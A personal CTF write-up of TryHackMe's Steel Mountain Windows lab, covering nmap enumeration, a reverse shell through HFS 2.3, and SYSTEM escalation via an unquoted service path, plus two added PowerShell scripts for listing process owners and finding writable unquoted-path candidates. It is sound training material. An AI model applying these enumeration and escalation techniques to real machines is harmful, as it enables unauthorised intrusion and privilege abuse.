Hello there and welcome to my first ever write-up.
Recently I’ve been spending a lot of time on TryHackMe; it’s a really addictive platform for studying and practising your hacking skills at the same time. Instead of just posting commands and theory, I’ve decided to do write-ups, as they provide much more value. So let’s get started. Here’s a link to the box.
Steel Mountain is a Windows-themed machine from TryHackMe, based on the Mr. Robot TV series (my all-time favourite show). The official walkthrough uses Metasploit, which makes it pretty easy to root. However, we’ll be doing it all manually today, because auto-exploit tools such as Metasploit are restricted on the OSCP exam.
Doing it by hand teaches you what happens behind the scenes, so when a script that does everything automatically fails, you can fall back on the manual approach. I’ve kept the methodology simple: Enumeration, Exploitation & Privilege Escalation.
Enumeration
Running a Nmap scan:
┌──(kali㉿kali)-[~]
└─$ export IP=10.10.212.213
┌──(kali㉿kali)-[~]
└─$ nmap -A -Pn -v $IP
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-10-11T19:04:29
| Not valid after: 2021-04-12T19:04:29
| MD5: cf4c 483f 7654 c778 e6b9 0144 1de0 18c9
|_SHA-1: ed4f 6cac 8059 d465 9e7b 7730 8ac4 56a4 67df d29c
|_ssl-date: 2021-02-05T15:22:17+00:00; -1s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:d5:4c:6e:e4:ef (unknown)
| Names:
| STEELMOUNTAIN Flags:
| WORKGROUP Flags:
|_ STEELMOUNTAIN Flags:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-05T15:22:11
|_ start_date: 2021-02-05T14:09:29
I like including the -v flag for verbosity: results come in while the scan is still running, so I can start probing anything interesting straight away. On port 80 we find a Microsoft IIS web server whose only content is a random picture of someone from the Mr. Robot series.
Running dirbuster doesn’t give us anything interesting.
Exploring the web server on port 8080, we find HttpFileServer (HFS) version 2.3. In the bottom-left corner the “Server Information” panel contains a link to the vendor’s website:
Exploitation
Let’s search for known exploits against this version of the web server:
Copy the exploit to a local path and check its usage. After reading through it, we need a reverse shell payload; I’ll use PowerShell, as I haven’t tested it much. The code is below; make sure you change the IP and port values to your own.
With the payload configured, start the Netcat listener (sudo is needed if the port is 1023 or below) and the HTTP server from which the target will download and run the reverse shell binary:
We’re in. Now it’s time for more enumeration: we need to find weak points and vulnerable configurations. I always start by finding out who I am and what my privileges are.
whoami
listening on [any] 443 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.212.213] 50067
PS C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
steelmountain\bill
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Bypass traverse checking (SeChangeNotifyPrivilege) lets a process pass through folders it has no permission to list in order to reach a file deeper down that it does have access to. Every user holds it by default, so there is nothing to abuse here: no SeImpersonate, SeBackup or similar privilege is present, and we’ll have to look elsewhere.
Other (hidden) users
Let’s list the other accounts on the system; the -Force parameter of Get-ChildItem shows hidden items as well:
PS C:\Users\bill\Desktop> net users
User accounts for \\STEELMOUNTAIN
-------------------------------------------------------------------------------
Administrator bill Guest
The command completed successfully.
PS C:\Users\bill\Downloads> Get-ChildItem C:\Users -Force | select Name
Name
----
Administrator
All Users
bill
Default
Default User
Public
desktop.ini
Any users in the Administrators group
Only the built-in Administrator is a member of the Administrators group; bill is not.
PS C:\Users\bill\Downloads> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
Although we have an open RDP port (3389), I couldn’t connect; I’m not sure why.
Tip: Run keys under HKLM fire for every user who logs on to the machine, whereas Run keys under HKCU only fire when that particular user logs on.
Check for weak folder permissions
We’ll look for weak folder permissions on each drive with accesschk.exe from the Sysinternals suite, downloaded from the official Microsoft website. You can use your Apache server or an SMB server to transfer it (the scan took me about a minute; be patient). Add -accepteula the first time you run it, so the EULA prompt doesn’t hang a non-interactive shell.
The IObit software gets my attention immediately, because it’s unusual (once you’ve seen the defaults a few times, you’ll recognise them). Searching again for weak file permissions with “.\accesschk.exe -uwqs Users c:\” gives me the same results.
This one-liner lists process owners without needing admin rights. A blank Owner means the GetOwner() call was refused; from a low-privileged account that almost always means the process runs as SYSTEM, NETWORK SERVICE or LOCAL SERVICE.
PS C:\Users\bill\Downloads> Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
Name Handle Owner
---- ------ -----
System Idle Process 0
System 4
smss.exe 360
csrss.exe 492
csrss.exe 544
wininit.exe 572
winlogon.exe 580
services.exe 640
lsass.exe 648
ASCService.exe 824
dwm.exe 836
spoolsv.exe 1208
amazon-ssm-agent.exe 1252
LiteAgent.exe 1324
LiveUpdate.exe 1452
Ec2Config.exe 1664
WmiPrvSE.exe 2368
taskhostex.exe 2628 bill
explorer.exe 2692 bill
hfs.exe 2504 bill
msdtc.exe 3488
powershell.exe 3636 bill
powershell.exe 3660 bill
conhost.exe 3668 bill
conhost.exe 3692 bill
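To tell a refused lookup apart from a genuinely empty result, here is a variant I’ve added (it is not from the original write-up) that calls GetOwner through Get-CimInstance and Invoke-CimMethod, reports Domain\User, and marks processes whose owner query was denied together with the WMI return code. The svchost filter and the column layout mirror the one-liner above; the “<denied>” markers are my own convention.

```powershell
# Added example: process list with Domain\User owners, distinguishing an
# "owner lookup refused" result (WMI return code 2 = access denied) from a
# genuinely empty one. Runs as a low-privileged user; no admin rights needed.
function Get-ProcessOwners {
    Get-CimInstance -ClassName Win32_Process |
        Where-Object { $_.Name -notlike 'svchost*' } |
        ForEach-Object {
            $proc  = $_
            $owner = '<denied>'            # default if the call throws
            try {
                $r = Invoke-CimMethod -InputObject $proc -MethodName GetOwner
                if ($r.ReturnValue -eq 0) {
                    $owner = '{0}\{1}' -f $r.Domain, $r.User
                } else {
                    $owner = "<denied rc=$($r.ReturnValue)>"
                }
            } catch { }
            [pscustomobject]@{
                Name  = $proc.Name
                PID   = $proc.ProcessId
                Owner = $owner
            }
        }
}

# Processes we cannot query are the ones running in a higher context;
# those are the targets worth looking at for privilege escalation.
Get-ProcessOwners | Sort-Object Owner, Name | Format-Table -AutoSize
```

Processes that show up as denied are exactly the SYSTEM/service ones the text above describes; bill’s own processes resolve to STEELMOUNTAIN\bill.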
Query the service
We saw AdvancedSystemCareService almost on every check, let’s query the service to check out its config:
PS C:\Users\bill\Downloads> cmd.exe /c 'sc qc AdvancedSystemCareService9'
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 1
DISPLAY_NAME : Advanced SystemCare Service 9
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The binary path is unquoted and contains spaces. When the Service Control Manager starts it, Windows tries each space-delimited prefix with .exe appended before it reaches the real executable: C:\Program.exe, then C:\Program Files.exe, then C:\Program Files (x86)\IObit\Advanced.exe. We normally can’t write to C:\, but we confirmed with accesschk.exe that we have read & write (RW) access to C:\Program Files (x86)\IObit\, so that is where our payload goes, named Advanced.exe. Since SERVICE_START_NAME is LocalSystem, whatever the service launches runs as SYSTEM. The service is currently running (see above), so it has to be restarted for the new path lookup to happen.
Let’s create our second reverse shell payload with msfvenom, name it Advanced.exe, transfer it to the target with certutil.exe and start a listener on the chosen port. Stop the service, confirm it’s stopped with Get-Service, then start it again. The Service Control Manager will eventually report a timeout because Advanced.exe never registers as a service; if your shell dies at that point, regenerate the payload with -f exe-service so it is wrapped in a proper service executable:
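As an added example (not from the original write-up), here is a PowerShell script that generalises the reasoning above to every service on the host: it lists services whose binary path is unquoted and contains spaces, computes each intermediate path the Service Control Manager will try before the real executable, and tests whether the current user can create a file in that directory. It reads services via Get-CimInstance (Get-WmiObject behaves the same on older hosts); the probe-file approach is my own choice, and it checks write access only, not whether you are allowed to stop or start the service.

```powershell
# Added example: find unquoted service paths and the candidate directories
# the current (low-privileged) user can write to. No admin rights needed.

function Get-UnquotedPathCandidates {
    # For an unquoted path with spaces, CreateProcess tries each space-delimited
    # prefix with ".exe" appended before reaching the real executable, e.g.
    #   C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
    # yields C:\Program.exe, C:\Program Files.exe and
    #        C:\Program Files (x86)\IObit\Advanced.exe
    param([Parameter(Mandatory)][string]$ExePath)
    $candidates = @()
    $idx = $ExePath.IndexOf(' ')
    while ($idx -gt 0) {
        $candidates += $ExePath.Substring(0, $idx) + '.exe'
        $idx = $ExePath.IndexOf(' ', $idx + 1)
    }
    return $candidates
}

function Test-DirectoryWritable {
    # Create and delete a throwaway file: an actual write attempt is what
    # matters for planting a binary, and it avoids parsing ACLs by hand.
    param([Parameter(Mandatory)][string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('probe_{0}.tmp' -f [guid]::NewGuid().ToString('N'))
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePaths {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        # Quoted or empty paths are not exploitable this way.
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { return }
        # Keep only the executable, dropping any arguments that follow it.
        if (-not ($path -match '^(?<exe>.*?\.exe)')) { return }
        $exe = $Matches['exe']
        if ($exe -notmatch ' ') { return }
        foreach ($cand in (Get-UnquotedPathCandidates -ExePath $exe)) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName      # LocalSystem = SYSTEM shell
                StartMode = $svc.StartMode
                State     = $svc.State
                Candidate = $cand
                Writable  = Test-DirectoryWritable -Dir (Split-Path -Path $cand -Parent)
            }
        }
    }
}

# Only writable hits matter; a LocalSystem service with a writable candidate
# directory is exactly the path used against AdvancedSystemCareService9.
Find-UnquotedServicePaths | Where-Object { $_.Writable } | Format-Table -AutoSize
```

On this box the script should return a single row for AdvancedSystemCareService9 with Candidate C:\Program Files (x86)\IObit\Advanced.exe and RunsAs LocalSystem. Drop the Where-Object filter to see every candidate, including the unwritable C:\Program.exe and C:\Program Files.exe entries, and remember that restarting the service still requires the stop/start rights the write-up relies on.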